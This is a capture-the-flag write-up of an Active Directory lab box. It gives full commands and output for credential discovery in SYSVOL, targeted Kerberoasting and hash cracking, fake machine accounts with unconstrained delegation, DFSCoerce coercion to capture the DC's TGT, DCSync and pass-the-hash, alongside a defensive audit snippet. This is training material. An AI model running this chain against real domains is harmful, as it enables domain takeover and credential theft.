Introduction #
Delegate is an Active Directory box that starts with a batch script, found in an open SMB share, containing credentials. Using those to collect BloodHound data, I discover a path to another user who holds SeEnableDelegationPrivilege, which can be used to configure unconstrained delegation. After capturing the DC machine account TGT I can DCSync to dump the Administrator NTLM hash and own the domain.
Recon #
nmap #
nmap finds lots of TCP ports:
sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.234.69
-sC for default scripts
-sV enumerate versions
-vv double verbose
-oA output in all formats
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-12-10 08:52:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-12-10T08:52:54+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| DNS_Tree_Name: delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-12-10T08:52:14+00:00
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-09T08:49:54
| Not valid after: 2026-06-10T08:49:54
| MD5: 5cf5:5ed3:467f:d5b9:6b81:769c:eaf9:7371
| SHA-1: b50a:ab2f:6dd9:db6d:9c70:96cb:b81d:d1e7:86dd:1f49
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-10T08:52:17
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30710/tcp): CLEAN (Timeout)
| Check 2 (port 53294/tcp): CLEAN (Timeout)
| Check 3 (port 57962/udp): CLEAN (Timeout)
| Check 4 (port 6404/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Based on the open ports, the box is a Windows Domain Controller. The domain is delegate.vl and the hostname is DC1.
I can generate a hosts file:
└─$ netexec smb 10.129.234.69 --generate-hosts-file delegate.hosts
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
└─$ cat delegate.hosts
10.129.234.69 DC1.delegate.vl delegate.vl DC1
and add it to /etc/hosts
SMB - TCP 445 #
Shares #
Using guest authentication, I can list the SMB shares:
└─$ netexec smb delegate.vl -u guest -p '' --shares
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guest:
SMB 10.129.234.69 445 DC1 [*] Enumerated shares
SMB 10.129.234.69 445 DC1 Share Permissions Remark
SMB 10.129.234.69 445 DC1 ----- ----------- ------
SMB 10.129.234.69 445 DC1 ADMIN$ Remote Admin
SMB 10.129.234.69 445 DC1 C$ Default share
SMB 10.129.234.69 445 DC1 IPC$ READ Remote IPC
SMB 10.129.234.69 445 DC1 NETLOGON READ Logon server share
SMB 10.129.234.69 445 DC1 SYSVOL READ Logon server share
users.bat #
In the SYSVOL share there is a users.bat script:
└─$ smbclient -N //delegate.vl/SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
4652287 blocks of size 4096. 1115992 blocks available
smb: \> cd delegate.vl
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023
4652287 blocks of size 4096. 1115993 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
4652287 blocks of size 4096. 1115993 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
This script has credentials for A.Briggs:
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
Login as A.Briggs #
I verified the password works:
└─$ netexec smb delegate.vl -u A.Briggs -p 'P4ssw0rd1#123'
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
The password works on SMB but fails on WinRM and RDP.
BloodHound #
With the credentials I can now collect BloodHound data:
└─$ bloodhound-ce-python -c all -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' -ns 10.129.234.69 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20251210041219_bloodhound.zip
Looking at the output, A.Briggs has GenericWrite privileges over another user - N.Thompson - who is a member of Remote Management Users, so they should be able to WinRM.

Shell as N. Thompson #
GenericWrite gives me enough privileges to perform targeted Kerberoasting.
I can assign an SPN to N.Thompson, request a service ticket for that fake service, and get a ticket encrypted with N.Thompson's password hash, which I can then try to crack offline.
Or I can use this script, which does all of that automatically:
└─$ python3 ~/Tools/targetedKerberoast/targetedKerberoast.py -v -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$1c6597db9e8314837f92b8a5c7782cb9$<SNIP>
[VERBOSE] SPN removed successfully for (N.Thompson)
Now I can attempt to crack it:
└─$ hashcat -m 13100 thompson.hash ~/Tools/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 5 3600 6-Core Processor, 4210/8485 MB (2048 MB allocatable), 6MCU
< SNIP >
Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$1c6597db9e8314837f92b8a5c7782cb9$<SNIP>:KALEB_2341
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...e776b1
Time.Started.....: Wed Dec 10 05:01:03 2025 (17 secs)
Time.Estimated...: Wed Dec 10 05:01:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 650.5 kH/s (1.93ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11003904/14344384 (76.71%)
Rejected.........: 0/11003904 (0.00%)
Restore.Point....: 10997760/14344384 (76.67%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: KBKBKB1 -> KACILOU1*
Hardware.Mon.#1..: Util: 32%
Started: Wed Dec 10 05:01:01 2025
Stopped: Wed Dec 10 05:01:22 2025
The cracked password KALEB_2341 works:
└─$ netexec smb delegate.vl -u N.Thompson -p 'KALEB_2341'
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
Shell #
Now I can try to get a shell using WinRM:
└─$ evil-winrm -i delegate.vl -u N.Thompson -p 'KALEB_2341'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> cat ../Desktop/user.txt
75ffb0f6e**********3b424aafe8
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
Also grab the user flag.
Administrator #
Besides the flag, there’s nothing interesting that N.Thompson can access.
But he has some interesting privileges:
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I can use the SeEnableDelegationPrivilege to escalate.
Unconstrained Delegation #
The N.Thompson user can enable delegation on accounts in the domain.
Unconstrained Delegation: A machine configured with Unconstrained Delegation will store any TGT of users connecting to it in memory. This allows the machine to then impersonate that user. To configure this, the userAccountControl attribute of the machine gets modified to include the TRUSTED_FOR_DELEGATION flag (which requires the SeEnableDelegationPrivilege domain privilege).
More information HERE
To abuse this, I will create a new machine account and its DNS record, give it an SPN, and set it up for unconstrained delegation.
Then I can coerce the DC into authenticating to the new fake machine and capture a copy of its TGT.
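To make the flag concrete from the defender's side, here is an added example (not from the original writeup) that decodes userAccountControl and lists non-DC accounts with TRUSTED_FOR_DELEGATION set; the records are constructed to mirror the box, and the LDAP filter is what an audit would run server-side.

```python
# Added example, not from the original writeup: decode userAccountControl and
# report accounts with TRUSTED_FOR_DELEGATION set, i.e. the unconstrained-
# delegation setting that SeEnableDelegationPrivilege lets a user switch on.

# Subset of userAccountControl bits (MS-ADTS userAccountControl bits).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",               # domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation
    0x100000: "NOT_DELEGATED",                    # "sensitive and cannot be delegated"
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained, protocol transition
}

TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000

# LDAP filter for the same audit server-side: bitwise-AND matching rule
# 1.2.840.113556.1.4.803 on the unconstrained bit, excluding DCs, which
# carry the flag by design.
AUDIT_FILTER = (
    "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))"
)


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def unconstrained_delegation_findings(records):
    """(sAMAccountName, flags, SPNs) for non-DC accounts trusted for unconstrained delegation."""
    findings = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        if uac & SERVER_TRUST_ACCOUNT:
            continue  # DCs are expected to be trusted for delegation
        findings.append((rec["sAMAccountName"], decode_uac(uac),
                         list(rec.get("servicePrincipalName", []))))
    return findings


# Constructed sample records mirroring the box: DC1$ is a DC (532480 is the usual
# DC value), faker$ is a workstation account after the flag was added, N.Thompson
# is a plain user account.
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC1$", "userAccountControl": 532480,
     "servicePrincipalName": ["ldap/DC1.delegate.vl", "cifs/DC1.delegate.vl"]},
    {"sAMAccountName": "faker$", "userAccountControl": 4096 | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["cifs/faker.delegate.vl"]},
    {"sAMAccountName": "N.Thompson", "userAccountControl": 66048, "servicePrincipalName": []},
]

if __name__ == "__main__":
    for name, flags, spns in unconstrained_delegation_findings(SAMPLE_RECORDS):
        print(f"{name}: {', '.join(flags)} SPNs={spns}")
```

A newly created computer account that gains this flag outside of change control, as faker$ does here, is the finding that should page someone.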
Machine Setup #
First I will use impacket-addcomputer to create the fake machine account:
└─$ impacket-addcomputer -computer-name faker -computer-pass faker123 -dc-ip 10.129.234.69 delegate.vl/N.Thompson:'KALEB_2341'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account faker$ with password faker123.
Now I can add a DNS record so objects on the domain can resolve the fake host:
https://github.com/dirkjanm/krbrelayx
└─$ python3 ~/Tools/krbrelayx/dnstool.py -u 'delegate.vl\faker$' -p 'faker123' --action add --record faker.delegate.vl --data 10.10.15.25 --type A -dns-ip 10.129.234.69 delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
And to finish the setup I need to assign it an SPN:
└─$ python3 ~/Tools/krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/faker.delegate.vl' -t 'faker$' -dc-ip 10.129.234.69 delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
Now I can give the host unconstrained delegation using BloodyAD:
└─$ bloodyAD -d delegate.vl -u N.Thompson -p KALEB_2341 --host delegate.vl add uac 'faker$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to faker$'s userAccountControl
Relay #
Now I can set up the relay by running krbrelayx.
I need to give it the NTLM hash of the fake computer's password, faker123. I can calculate it in Python:
import hashlib

# NT hash: MD4 over the UTF-16LE encoding of the password (hashlib needs OpenSSL's legacy provider for MD4)
password = 'faker123'
print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())
└─$ python cr_ntlm_hash.py
745e7f210811349ab159a55853dab708
With that I can start the relay:
└─$ python3 ~/Tools/krbrelayx/krbrelayx.py -hashes :745e7f210811349ab159a55853dab708
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
I now need to coerce the DC into authenticating to faker.delegate.vl. For that I can use NetExec and its coerce_plus module:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 -M coerce_plus
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\faker$:faker123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, MSEven
It is vulnerable to every method; I will use DFSCoerce:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 -M coerce_plus -o LISTENER=faker.delegate.vl METHOD=DFSCoerce
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\faker$:faker123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsRemoveRootTarget
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsAddStdRoot
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsRemoveStdRoot
At the relay I get this response:
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
It saved the TGT of the DC machine account to a ccache file.
DCSync #
With the TGT for the DC machine account, I can do a DCSync attack to get all the hashes for the domain. First I generate a krb5.conf so netexec can use the Kerberos ccache:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 --generate-krb5-file krb5.conf
SMB 10.129.56.255 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB 10.129.56.255 445 DC1 [+] delegate.vl\faker$:faker123
With that I can authenticate as the machine account:
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb delegate.vl --use-kcache
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
And dump the domain hashes:
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb delegate.vl --use-kcache --ntds
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
SMB dc1.delegate.vl 445 DC1 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc1.delegate.vl 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc1.delegate.vl 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB dc1.delegate.vl 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB dc1.delegate.vl 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
< SNIP >
Administrator #
With the hash I can connect using Evil-WinRM:
└─$ evil-winrm -i delegate.vl -u administrator -H c32198ceab4cc695e65045562aa3ee93
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
65bbcb00071*********47521b2b
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And grab the root flag!